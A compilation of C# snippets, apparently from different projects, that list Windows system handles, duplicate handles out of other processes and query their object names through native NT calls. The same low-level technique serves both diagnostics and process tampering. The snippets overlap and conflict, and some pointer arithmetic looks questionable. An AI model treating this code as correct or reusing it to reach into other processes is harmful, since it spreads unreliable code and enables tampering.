/// <summary> /// <para>Gets system handle information.</para> /// <para>This is not a cheap call.</para> /// </summary> /// <returns>Managed Copy of a Windows SYSTEM_HANDLE_INFORMATION struct</returns> public static SYSTEM_HANDLE_INFORMATION GetSystemHandleInformation() { var ntstatus = NTSTATUS.InfoLengthMismatch; var cbbuf = 0x1000; var buf = Marshal.AllocHGlobal(cbbuf); try { var returnLength = 0; while (ntstatus == NTSTATUS.InfoLengthMismatch) { cbbuf *= 2; buf = Marshal.ReAllocHGlobal(buf, new IntPtr(cbbuf)); ntstatus = NtQuerySystemInformation( SYSTEM_INFORMATION_CLASS.SystemHandleInformation, buf, cbbuf, out returnLength); } if (ntstatus != NTSTATUS.Success) { Trace.WriteLine("ntstatus err code: " + ntstatus); return new SYSTEM_HANDLE_INFORMATION { Count = 0, Handles = new SYSTEM_HANDLE[0], }; } var systemHandleInformation = new SYSTEM_HANDLE_INFORMATION(); systemHandleInformation.Count = Marshal.ReadInt32(buf); systemHandleInformation.Handles = new SYSTEM_HANDLE[systemHandleInformation.Count]; var sizeOfSystemHandleEntry = Marshal.SizeOf(typeof(SYSTEM_HANDLE)); for (int i = 0; i < systemHandleInformation.Count; i++) { IntPtr ptr = (buf + (4 + (i * sizeOfSystemHandleEntry))); SYSTEM_HANDLE entry = (SYSTEM_HANDLE)Marshal.PtrToStructure(ptr, typeof(SYSTEM_HANDLE)); systemHandleInformation.Handles[i] = entry; } return systemHandleInformation; } finally { Marshal.FreeHGlobal(buf); } }
/// <summary> /// Queries for name of handle. /// </summary> /// <param name="targetHandleInfo">The handle info.</param> /// <param name="hProcess">Open handle to the process which owns that handle.</param> /// <returns></returns> private static string GetHandleName(SYSTEM_HANDLE_INFORMATION targetHandleInfo, IntPtr hProcess) { //skip special NamedPipe handle (this may cause hang up with NtQueryObject function) if (targetHandleInfo.AccessMask.ToInt64() == 0x0012019F) { return String.Empty; } IntPtr thisProcess = Process.GetCurrentProcess().Handle; IntPtr handle; // Need to duplicate handle in this process to be able to access name DuplicateHandle(hProcess, new IntPtr(targetHandleInfo.HandleValue), thisProcess, out handle, 0, false, DuplicateOptions.DUPLICATE_SAME_ACCESS); // Setup buffer to store unicode string int bufferSize = GetHandleNameLength(handle); // Allocate unmanaged memory to store name IntPtr pStringBuffer = Marshal.AllocHGlobal(bufferSize); // Query to fill string buffer with name NtQueryObject(handle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, pStringBuffer, bufferSize, out bufferSize); // Close this handle CloseHandle(handle); //super important... almost missed this // Do the conversion to managed type string handleName = ConvertToString(pStringBuffer); // Release Marshal.FreeHGlobal(pStringBuffer); return handleName; }
public static List <SYSTEM_HANDLE_INFORMATION> GetHandles(Process process = null, string IN_strObjectTypeName = null, string IN_strObjectName = null) { int nHandleInfoSize = 0x10000; IntPtr ipHandlePointer = Marshal.AllocHGlobal(nHandleInfoSize); int nLength = 0; while ((_ = NtQuerySystemInformation(16, ipHandlePointer, nHandleInfoSize, ref nLength)) == 0xC0000004) { nHandleInfoSize = nLength; Marshal.FreeHGlobal(ipHandlePointer); ipHandlePointer = Marshal.AllocHGlobal(nLength); } byte[] baTemp = new byte[nLength]; Marshal.Copy(ipHandlePointer, baTemp, 0, nLength); IntPtr ipHandle; long lHandleCount; if (Is64Bits()) { lHandleCount = Marshal.ReadInt64(ipHandlePointer); ipHandle = new IntPtr(ipHandlePointer.ToInt64() + 8); } else { lHandleCount = Marshal.ReadInt32(ipHandlePointer); ipHandle = new IntPtr(ipHandlePointer.ToInt32() + 4); } SYSTEM_HANDLE_INFORMATION shHandle; List <SYSTEM_HANDLE_INFORMATION> lstHandles = new List <SYSTEM_HANDLE_INFORMATION>(); for (long lIndex = 0; lIndex < lHandleCount; lIndex++) { shHandle = new SYSTEM_HANDLE_INFORMATION(); if (Is64Bits()) { shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType()); ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle) + 8); } else { ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle)); shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType()); } if (process != null) { if (shHandle.ProcessID != process.Id) { continue; } } if (IN_strObjectTypeName != null) { var strObjectTypeName = GetObjectTypeName(shHandle, Process.GetProcessById(shHandle.ProcessID)); if (strObjectTypeName != IN_strObjectTypeName) { continue; } } if (IN_strObjectName != null) { var strObjectName = GetObjectName(shHandle, Process.GetProcessById(shHandle.ProcessID)); if (string.IsNullOrEmpty(strObjectName) || !strObjectName.Contains(IN_strObjectName)) { continue; } } lstHandles.Add(shHandle); } return(lstHandles); }
private static Device GetHandleName(SYSTEM_HANDLE_INFORMATION systemHandleInformation, Process process, int count, int handleCount) { IntPtr ipHandle = IntPtr.Zero; IntPtr openProcessHandle = IntPtr.Zero; IntPtr hObjectName = IntPtr.Zero; Device IDFound = null; Int32 accessMask = (Int32)systemHandleInformation.AccessMask; if (systemHandleInformation.ProcessID != process.Id || accessMask == 0x0012019f || accessMask == 0x001a019f || accessMask == 0x00120189 || accessMask == 0x00100000) { return(IDFound); } try { //Set up flags for and then get a process handle for the current process being checked PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead; openProcessHandle = OpenProcess(flags, false, process.Id); //Duplicate the process handle into ipHandle, if this fails return null if (!DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS)) { return(IDFound); } int nLength = 0; hObjectName = Marshal.AllocHGlobal(256 * 1024); //Allocate memory for a max length handle name //Try to find out exactly how long the object name is, then once you've allocated the proper amount of memory, copy it into hObjectName while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectNameInformation, hObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { Marshal.FreeHGlobal(hObjectName); if (nLength == 0) { Console.WriteLine("Length returned at zero!"); return(IDFound); } hObjectName = Marshal.AllocHGlobal(nLength); } //Move the infromation in hObjectName to an easier to use structure OBJECT_NAME_INFORMATION OBJECT_NAME_INFORMATION objObjectName = Marshal.PtrToStructure <OBJECT_NAME_INFORMATION>(hObjectName); //Check if we have a proper name if (objObjectName.Name.Buffer != IntPtr.Zero) { //Convert objObjectName to a normal string, this is the handle's name string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer); bool deviceIDFound = false; //Check the handle name for if it contains anything releveant (in this case it's checking for a device ID) if it does, return it foreach (Device device in deviceList) { if (strObjectName.ToLower().Contains(device.PNPDeviceIDSubstring.ToLower())) { IDFound = device; deviceIDFound = true; } } if (deviceIDFound) { //Console.WriteLine("Handle matched!!!\n\n\nProcess Name: " + process.ProcessName + "strObjectName: " + strObjectName + "\nid: " + IDFound + "\n\n\n"); } else { //If it doesnt, return null //Console.WriteLine("(" + count + " / " + handleCount + "): " + strObjectName); } } } catch (Exception ex) { Console.WriteLine(ex.Message); } finally { //Clean up managed memory Marshal.FreeHGlobal(hObjectName); CloseHandle(ipHandle); CloseHandle(openProcessHandle); } return(IDFound); }
public static string GetObjectName(SYSTEM_HANDLE_INFORMATION shHandle, Process process) { var m_ipProcessHwnd = OpenProcess(ProcessAccessFlags.All, false, process.Id); var objBasic = new OBJECT_BASIC_INFORMATION(); var objObjectName = new OBJECT_NAME_INFORMATION(); int nLength = 0; if (!DuplicateHandle(m_ipProcessHwnd, shHandle.Handle, GetCurrentProcess(), out IntPtr ipHandle, 0, false, 0x2)) { return(null); } var ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic)); NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation, ipBasic, Marshal.SizeOf(objBasic), ref nLength); objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType()); Marshal.FreeHGlobal(ipBasic); nLength = objBasic.NameInformationLength; IntPtr ipObjectName = Marshal.AllocHGlobal(nLength); while ((uint)(_ = NtQueryObject( ipHandle, (int)ObjectInformationClass.ObjectNameInformation, ipObjectName, nLength, ref nLength)) == 0xC0000004) { Marshal.FreeHGlobal(ipObjectName); ipObjectName = Marshal.AllocHGlobal(nLength); } objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ipObjectName, objObjectName.GetType()); IntPtr ipTemp; if (Is64Bits()) { ipTemp = new IntPtr(Convert.ToInt64(objObjectName.Name.Buffer.ToString(), 10) >> 32); } else { ipTemp = objObjectName.Name.Buffer; } if (ipTemp != IntPtr.Zero) { byte[] baTemp2 = new byte[nLength]; try { Marshal.Copy(ipTemp, baTemp2, 0, nLength); string strObjectName = Marshal.PtrToStringUni(Is64Bits() ? new IntPtr(ipTemp.ToInt64()) : new IntPtr(ipTemp.ToInt32())); return(strObjectName); } catch (AccessViolationException) { return(null); } finally { Marshal.FreeHGlobal(ipObjectName); CloseHandle(ipHandle); } } return(null); }
static List <SYSTEM_HANDLE_INFORMATION> GetHandles(Process process, int?type) { uint nStatus; int nHandleInfoSize = 0x10000; IntPtr ipHandlePointer = Marshal.AllocHGlobal(nHandleInfoSize); int nLength = 0; IntPtr ipHandle = IntPtr.Zero; List <SYSTEM_HANDLE_INFORMATION> lstHandles = new List <SYSTEM_HANDLE_INFORMATION>(); while ((nStatus = NtQuerySystemInformation(CNST_SYSTEM_HANDLE_INFORMATION, ipHandlePointer, nHandleInfoSize, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { nHandleInfoSize = nLength; Marshal.FreeHGlobal(ipHandlePointer); ipHandlePointer = Marshal.AllocHGlobal(nLength); } if (nStatus != 0) { Console.WriteLine($"[!] Failed to query handle information with error 0x{nStatus:x}"); return(lstHandles); } byte[] baTemp = new byte[nLength]; CopyMemory(baTemp, ipHandlePointer, (uint)nLength); long lHandleCount = 0; if (Is64Bits()) { lHandleCount = Marshal.ReadInt32(ipHandlePointer); ipHandle = new IntPtr(ipHandlePointer.ToInt64() + 8); } else { lHandleCount = Marshal.ReadInt32(ipHandlePointer); ipHandle = new IntPtr(ipHandlePointer.ToInt32() + 4); } SYSTEM_HANDLE_INFORMATION shHandle; for (long lIndex = 0; lIndex < lHandleCount; lIndex++) { shHandle = new SYSTEM_HANDLE_INFORMATION(); if (Is64Bits()) { shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType()); ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle) + 8); } else { ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle)); shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType()); } if (shHandle.ProcessID != process.Id) { continue; } if (!type.HasValue) { lstHandles.Add(shHandle); } else if (type.Value == shHandle.ObjectTypeNumber) { lstHandles.Add(shHandle); } } return(lstHandles); }
public static List <HandleInformation> GetHandlesByType(string strHandleType = "Directory") { uint nStatus; var nHandleInfoSize = 0x10000; var ipHandlePointer = Marshal.AllocHGlobal(nHandleInfoSize); var nLength = 0; var ipHandle = IntPtr.Zero; while ((nStatus = Native.NtQuerySystemInformation(CNST_SYSTEM_HANDLE_INFORMATION, ipHandlePointer, nHandleInfoSize, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH) { nHandleInfoSize = nLength; Marshal.FreeHGlobal(ipHandlePointer); ipHandlePointer = Marshal.AllocHGlobal(nLength); } var baTemp = new byte[nLength]; Marshal.Copy(ipHandlePointer, baTemp, 0, nLength); long lHandleCount = 0; if (Is64Bits()) { lHandleCount = Marshal.ReadInt64(ipHandlePointer); ipHandle = new IntPtr(ipHandlePointer.ToInt64() + 8); } else { lHandleCount = Marshal.ReadInt32(ipHandlePointer); ipHandle = new IntPtr(ipHandlePointer.ToInt32() + 4); } List <HandleInformation> toReturn = new List <HandleInformation>(); for (long lIndex = 0; lIndex < lHandleCount; lIndex++) { var shHandle = new SYSTEM_HANDLE_INFORMATION(); var realInfo = new HandleInformation(); if (Is64Bits()) { shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType()); ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle) + 8); } else { ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle)); shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType()); } if (MiniMem.AttachedProcess.ProcessObject != null) { if (shHandle.ProcessID != MiniMem.AttachedProcess.ProcessObject.Id) { continue; } } if (strHandleType != null) { var strObjectTypeName = getObjectTypeName(shHandle, Process.GetProcessById(shHandle.ProcessID)); if (strObjectTypeName != strHandleType) { continue; } } realInfo.HandleName = getObjectName(shHandle, Process.GetProcessById(shHandle.ProcessID)); realInfo.Advanced = shHandle; if (realInfo.HandleName == null) { continue; } toReturn.Add(realInfo); } return(toReturn); }